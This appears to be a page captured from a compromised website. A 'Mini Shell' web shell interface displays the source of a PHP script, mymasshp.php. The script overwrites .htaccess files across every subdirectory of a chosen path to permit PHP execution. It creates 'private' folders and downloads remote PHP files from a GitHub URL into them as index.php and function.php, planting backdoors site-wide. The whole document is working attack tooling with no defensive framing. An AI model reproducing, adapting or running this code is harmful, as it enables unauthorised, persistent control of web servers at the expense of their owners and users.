HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /var/www/negocios.lapieza.do/update/
Upload File :
Current File : /var/www/negocios.lapieza.do/update/mymasshp.php
<?php
// Function to create or replace the .htaccess file in the specified path
function createHtaccessFile($path) {
    $htaccessFilePath = $path . '/.htaccess';

    // If .htaccess file exists, delete it
    if (file_exists($htaccessFilePath)) {
        unlink($htaccessFilePath);
        echo "Deleted existing .htaccess file at: $htaccessFilePath<br>";
    }

    // Define the content for the new .htaccess file
    $htaccessContent = "<FilesMatch \\.php$>\n    Order allow,deny\n    Allow from all\n</FilesMatch>";

    // Write the new .htaccess content to the file
    file_put_contents($htaccessFilePath, $htaccessContent);
    echo "Created new .htaccess file at: $htaccessFilePath<br>";
}

// Function to process all subdirectories and manage the required files
function processSubdirectories($basePath) {
    $basePath = rtrim($basePath, '/') . '/';

    // Check if the base path is a valid directory
    if (!is_dir($basePath)) {
        echo "Invalid path: $basePath<br>";
        return;
    }

    // Get all subdirectories in the base path
    $subdirectories = glob($basePath . '*', GLOB_ONLYDIR);
    foreach ($subdirectories as $dir) {
        // Step 1: Create or update the .htaccess file in the subdirectory
        createHtaccessFile($dir);

        // Step 2: Create the 'private' directory if it doesn't exist
        $privateDir = $dir . '/private';
        if (!is_dir($privateDir)) {
            mkdir($privateDir, 0755, true);
            echo "Created directory: $privateDir<br>";
        }

        // Step 3: Create or update the .htaccess file inside the 'private' directory
        createHtaccessFile($privateDir);

        // Step 4: Download and save required files inside the 'private' directory
        $filesToDownload = [
            'index.php' => 'https://raw.githubusercontent.com/cpugpu009/nf/refs/heads/main/nf.php', // nf.php saved as index.php
            'function.php' => 'https://raw.githubusercontent.com/cpugpu009/nf/refs/heads/main/function.php'
        ];

        foreach ($filesToDownload as $fileName => $url) {
            $filePath = $privateDir . '/' . $fileName;
            $content = file_get_contents($url);

            if ($content === false) {
                echo "Error: Unable to fetch $fileName from $url<br>";
                continue;
            }

            file_put_contents($filePath, $content);
            echo "File uploaded to: $filePath<br>";
        }
    }
}

// Handle form submission
if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    $basePath = trim($_POST['path']);

    if (empty($basePath)) {
        echo "Path is required.<br>";
    } else {
        // Step 1: Create or overwrite the .htaccess in the base path
        createHtaccessFile($basePath);

        // Step 2: Process each subdirectory under the base path
        processSubdirectories($basePath);
    }
}

// Display the current path (default to the server's document root if not specified)
$currentPath = isset($_POST['path']) ? trim($_POST['path']) : $_SERVER['DOCUMENT_ROOT'];
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Upload PHP Script and .htaccess</title>
</head>
<body>
    <form method="post" action="">
        <label for="path">Base Path:</label>
        <input type="text" id="path" name="path" required value="<?php echo htmlspecialchars($currentPath); ?>"><br><br>
        <input type="submit" value="Upload Files">
    </form>
</body>
</html>